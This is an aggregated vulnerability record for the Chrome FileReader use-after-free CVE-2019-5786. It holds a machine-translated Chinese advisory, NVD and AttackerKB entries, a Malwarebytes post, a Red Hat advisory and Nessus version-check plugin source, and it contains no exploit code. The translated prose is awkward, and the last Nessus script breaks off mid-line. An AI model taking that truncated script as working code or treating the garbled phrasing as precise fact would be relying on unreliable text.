CVE-2019-5786: chrome in the wild exploit 0day vulnerability alerts-a vulnerability alert-the black bar safety net
2019-03-06T00:00:00
ID MYHACK58:62201993035 Type myhack58 Reporter 佚名 Modified 2019-03-06T00:00:00
Description
!
0x00 vulnerability background
Beijing 3 month 6 days, 360CERT monitoring to chrome release version update(72.0.3626.119->72.0.3626.121), fixes in the wild using CVE-2019-5786。 The vulnerability to harm is more serious, a greater impact.
0x01 vulnerability details
CVE-2019-5786 is located on the FileReader in the UAF vulnerability, by Google's Threat Analysis Group of the Clement Lecigne to 2019-02-27 of the report, currently not released other details.
The comparison of the two versions of the source code, found third_party/blink/renderer/core/fileapi/file_reader_loader. cc there are some changes. In the return part of the result copy the ArrayBuffer to avoid on the same underlying ArrayBuffer of the plurality of references.
!
0x02 safety recommendations
Use chrome users open chrome://settings/help page to see the current browser version, if not latest version(72.0.3626.121)will automatically check the upgrade, after the restart you can update to the latest version. Other use of the chromium core of the browser vendors also need to patch self-examination.
!
0x03 timeline
2019-02-27 vulnerability is reported
2019-03-01 chrome 72.0.3626.121 release
2019-03-05 google indicates that the vulnerability is in the Wild use
{"id": "MYHACK58:62201993035", "bulletinFamily": "info", "title": "CVE-2019-5786: chrome in the wild exploit 0day vulnerability alerts-a vulnerability alert-the black bar safety net", "description": "! [](/Article/UploadPic/2019-3/20193618498729.jpg) \n\n0x00 vulnerability background \nBeijing 3 month 6 days, 360CERT monitoring to chrome release version update(72.0.3626.119->72.0.3626.121), fixes in the wild using CVE-2019-5786\u3002 The vulnerability to harm is more serious, a greater impact. \n\n0x01 vulnerability details \nCVE-2019-5786 is located on the FileReader in the UAF vulnerability, by Google's Threat Analysis Group of the Clement Lecigne to 2019-02-27 of the report, currently not released other details. \nThe comparison of the two versions of the source code, found third_party/blink/renderer/core/fileapi/file_reader_loader. cc there are some changes. In the return part of the result copy the ArrayBuffer to avoid on the same underlying ArrayBuffer of the plurality of references. \n! [](/Article/UploadPic/2019-3/20193618498344. png) \n\n0x02 safety recommendations \nUse chrome users open chrome://settings/help page to see the current browser version, if not latest version(72.0.3626.121)will automatically check the upgrade, after the restart you can update to the latest version. Other use of the chromium core of the browser vendors also need to patch self-examination. \n! [](/Article/UploadPic/2019-3/20193618498792. png) \n\n0x03 timeline \n2019-02-27 vulnerability is reported \n2019-03-01 chrome 72.0.3626.121 release \n2019-03-05 google indicates that the vulnerability is in the Wild use \n\n0x04 reference links \nhttps://chromium.googlesource.com/chromium/src/+/150407e8d3610ff25a45c7c46877333c4425f062%5E%21/#F0 \n\n", "published": "2019-03-06T00:00:00", "modified": "2019-03-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://www.myhack58.com/Article/html/3/62/2019/93035.htm", "reporter": "\u4f5a\u540d", "references": [], "cvelist": ["CVE-2019-5786"], "type": "myhack58", "lastseen": "2019-03-06T15:30:17", "edition": 1, "viewCount": 87, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-5786"]}, {"type": "cve0day", "idList": ["CVE0DAY:851338C1B7DCB669BE46028279C70ED6"]}, {"type": "attackerkb", "idList": ["AKB:46AE5A4F-8BF9-4CF9-BB33-2CB591D7B62D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310875626", "OPENVAS:1361412562310852356", "OPENVAS:1361412562310814690", "OPENVAS:1361412562310814691", "OPENVAS:1361412562310704404", "OPENVAS:1361412562310814689"]}, {"type": "nodejs", "idList": ["NODEJS:824"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4404-1:0557C"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152772"]}, {"type": "exploitdb", "idList": ["EDB-ID:46812"]}, {"type": "archlinux", "idList": ["ASA-201903-1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:A8A37CB410AA65484D44919B49A3B8BF"]}, {"type": "thn", "idList": ["THN:9B9CD91CB050B48FE5802D55125DA161", "THN:04C2B4D392A1C67EF52FAF0D2CFA9E55"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2019-0481.NASL", "GOOGLE_CHROME_72_0_3626_121.NASL", "FEDORA_2019-561EAE4626.NASL", "DEBIAN_DSA-4404.NASL", "OPENSUSE-2019-298.NASL", "MACOSX_GOOGLE_CHROME_72_0_3626_121.NASL", "GENTOO_GLSA-201903-23.NASL", "FEDORA_2019-05A780936D.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/CHROME_FILEREADER_UAF"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0298-1"]}, {"type": "redhat", "idList": ["RHSA-2019:0481"]}, {"type": "kaspersky", "idList": ["KLA11436", "KLA11430"]}, {"type": "github", "idList": ["GHSA-C2GP-86P4-5935"]}, {"type": "zdt", "idList": ["1337DAY-ID-32669"]}, {"type": "krebs", "idList": ["KREBS:8CCFB0DC3A6FAC8000722BE0DCBA640E"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9"]}, {"type": "threatpost", "idList": ["THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B", "THREATPOST:0C6C1B17AFD30FEDE0604F98C6C93413"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993173"]}, {"type": "securelist", "idList": ["SECURELIST:A3CEAF1114E104F14254F7AF77D7D080"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126"]}, {"type": "gentoo", "idList": ["GLSA-201903-23"]}, {"type": "fedora", "idList": ["FEDORA:3240460C5991", "FEDORA:906EB6076D01"]}], "modified": "2019-03-06T15:30:17", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2019-03-06T15:30:17", "rev": 2}, "vulnersScore": 6.6}}
{"cve": [{"lastseen": "2020-12-09T21:41:54", "description": "Object lifetime issue in Blink in Google Chrome prior to 72.0.3626.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-06-27T17:15:00", "title": "CVE-2019-5786", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5786"], "modified": "2019-07-01T18:26:00", "cpe": [], "id": "CVE-2019-5786", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5786", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}], "cve0day": [{"lastseen": "2019-03-07T12:53:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "**Description**\n\nGoogle Chrome is prone to an arbitrary code execution vulnerability.\n\nAttackers can exploit this issue to execute arbitrary code in the context of the browser, Failed attempts will likely cause a denial-of-service condition.\n\nGoogle Chrome versions prior to 72.0.3626.121 are vulnerable.\n\n[Google Chrome CVE-2019-5786 Arbitrary Code Execution](<https://www.cve0day.com/google-chrome-cve-2019-5786-arbitrary-code-execution.html>)\u6700\u5148\u51fa\u73b0\u5728[CVE 0day](<https://www.cve0day.com>)\u3002", "modified": "2019-03-04T13:13:08", "published": "2019-03-04T13:13:08", "id": "CVE0DAY:851338C1B7DCB669BE46028279C70ED6", "href": "https://www.cve0day.com/google-chrome-cve-2019-5786-arbitrary-code-execution.html", "type": "cve0day", "title": "Google Chrome CVE-2019-5786 Arbitrary Code Execution", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2020-11-18T06:42:23", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "Google Chrome is prone to a use-after-free vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the browser. Failed attempts will likely cause a denial-of-service condition.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at September 23, 2020 8:20pm UTC reported:\n\nThis was exploited in the wild as noted at <https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html> and <https://blog.exodusintel.com/2019/05/17/windows-within-windows/>\n\n**pbarry-r7** at November 25, 2019 3:26pm UTC reported:\n\nThis was exploited in the wild as noted at <https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html> and <https://blog.exodusintel.com/2019/05/17/windows-within-windows/>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 2**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nThis was exploited in the wild as noted at <https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html> and <https://blog.exodusintel.com/2019/05/17/windows-within-windows/>\n", "modified": "2020-02-13T00:00:00", "published": "2019-06-27T00:00:00", "id": "AKB:46AE5A4F-8BF9-4CF9-BB33-2CB591D7B62D", "href": "https://attackerkb.com/topics/pLgqGAtHGG/google-chrome-cve-2019-5786-filereader-use-after-free-vulnerability", "type": "attackerkb", "title": "Google Chrome CVE-2019-5786 FileReader Use-After-Free Vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "malwarebytes": [{"lastseen": "2019-03-30T03:38:11", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5786"], "description": "**Update (2019-03-21)**\n\nA proof of concept for CVE-2019-5786 was [published by Exodus Intel](<https://github.com/exodusintel/CVE-2019-5786>). In our earlier post we exercised caution before claiming we would have blocked this zero-day, but we can now say with confidence that an older version of Malwarebytes (1.12.1.122) would have mitigated this attack:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/03/MBAE_Chrome_0day.png> \"\" )\n\nThis shows the benefits for certain applications from being allowed to inject into Chrome, something that Google's new policies have disabled.\n\n--\n\nIt's not often that we hear about a critical vulnerability in Google Chrome, and perhaps it's even more rare when Google's own engineers are urging users to patch.\n\nThere are several good reasons why you need to take this new Chrome zero-day ([CVE-2019-5786](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html>)) seriously. For starters, we are talking about a full exploitation that escapes the sandbox and leads to remote code execution. This in itself is not an easy feat, and is usually observed only sporadically, perhaps [during a Pwn2Own competition.](<https://www.computerworld.com/article/3186686/google-patches-chrome-bug-from-fizzled-pwn2own-hack.html>) But this time, Google is saying that this vulnerability is actively being used in the wild.\n\nAccording to [Cl\u00e9ment Lecigne](<https://twitter.com/_clem1>), the person from Google's Threat Analysis Group who discovered the attack, there is [another zero-day](<https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html?m=1>) that exists in Microsoft Windows (yet to be patched), suggesting the two could be chained up for even greater damage.\n\n\n\nProof of concept for CVE-2019-5786\n\nIf you are running Google Chrome and its version is below 72.0.3626.121, your computer could be exploited without your knowledge. While it's true that Chrome features an automatic update component, in order for the patch to be installed you must restart your browser.\n\nThis may not seem like a big deal but it is. Another Google engineer explains why this matters a lot, in comparison to past exploits:\n\n> This newest exploit is different, in that initial chain targeted Chrome code directly, and thus required the user to have restarted the browser after the update was downloaded. For most users the update download is automatic, but restart is a usually a manual action. [3/3]\n> \n> -- Justin Schuh  (@justinschuh) [March 7, 2019](<https://twitter.com/justinschuh/status/1103763266445037568?ref_src=twsrc%5Etfw>)\n\nConsidering how many users keep Chrome and all their tabs opened for days or even weeks without ever restarting the browser, the security impact is real.\n\nSome might see a bit of irony with this latest zero-day considering Google\u2019s move to [ban third-party software injections](<https://blog.chromium.org/2017/11/reducing-chrome-crashes-caused-by-third.html>). Many security programs, including Malwarebytes, need to hook into processes, such as the browser and common Office applications, in order to detect and block exploits from happening. However, we cannot say for sure whether or not this could prevent the vulnerability from being exploited, since few details have been shared yet.\n\nIn the meantime, if you haven't done so yet, you should [update and relaunch Chrome;](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop>) and don't worry about your tabs, they will come right back.\n\nThe post [Google Chrome zero-day: Now is the time to update and restart your browser](<https://blog.malwarebytes.com/cybercrime/exploits/2019/03/google-chrome-zero-day-now-is-the-time-to-update-and-restart-your-browser/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-03-08T19:13:15", "published": "2019-03-08T19:13:15", "id": "MALWAREBYTES:A8A37CB410AA65484D44919B49A3B8BF", "href": "https://blog.malwarebytes.com/cybercrime/exploits/2019/03/google-chrome-zero-day-now-is-the-time-to-update-and-restart-your-browser/", "type": "malwarebytes", "title": "Google Chrome zero-day: Now is the time to update and restart your browser", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.121.\n\nSecurity Fix(es):\n\n* chromium-browser: Use-after-free in FileReader (CVE-2019-5786)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-03-12T00:58:04", "published": "2019-03-12T00:57:08", "id": "RHSA-2019:0481", "href": "https://access.redhat.com/errata/RHSA-2019:0481", "type": "redhat", "title": "(RHSA-2019:0481) Important: chromium-browser security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-01T01:50:12", "description": "Clement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update.\nThe browser would always crash when launched in remote debugging mode.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-11T00:00:00", "title": "Debian DSA-4404-1 : chromium - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4404.NASL", "href": "https://www.tenable.com/plugins/nessus/122723", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4404. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122723);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/07/05 9:53:32\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_xref(name:\"DSA\", value:\"4404\");\n\n script_name(english:\"Debian DSA-4404-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Clement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update.\nThe browser would always crash when launched in remote debugging mode.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4404\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 72.0.3626.122-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"72.0.3626.122-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T03:09:01", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 72.0.3626.121. It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. (CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-06T00:00:00", "title": "Google Chrome < 72.0.3626.121 Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_72_0_3626_121.NASL", "href": "https://www.tenable.com/plugins/nessus/122617", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122617);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n\n script_name(english:\"Google Chrome < 72.0.3626.121 Vulnerability\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 72.0.3626.121. It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. (CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df49025b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/936448\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 72.0.3626.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5786\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'72.0.3626.121', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-31T20:20:53", "description": "An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.121.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use-after-free in FileReader (CVE-2019-5786)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 9, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-12T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2019:0481)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2019-03-12T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-0481.NASL", "href": "https://www.tenable.com/plugins/nessus/122771", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0481. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122771);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_xref(name:\"RHSA\", value:\"2019:0481\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:0481)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.121.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use-after-free in FileReader (CVE-2019-5786)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5786\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif 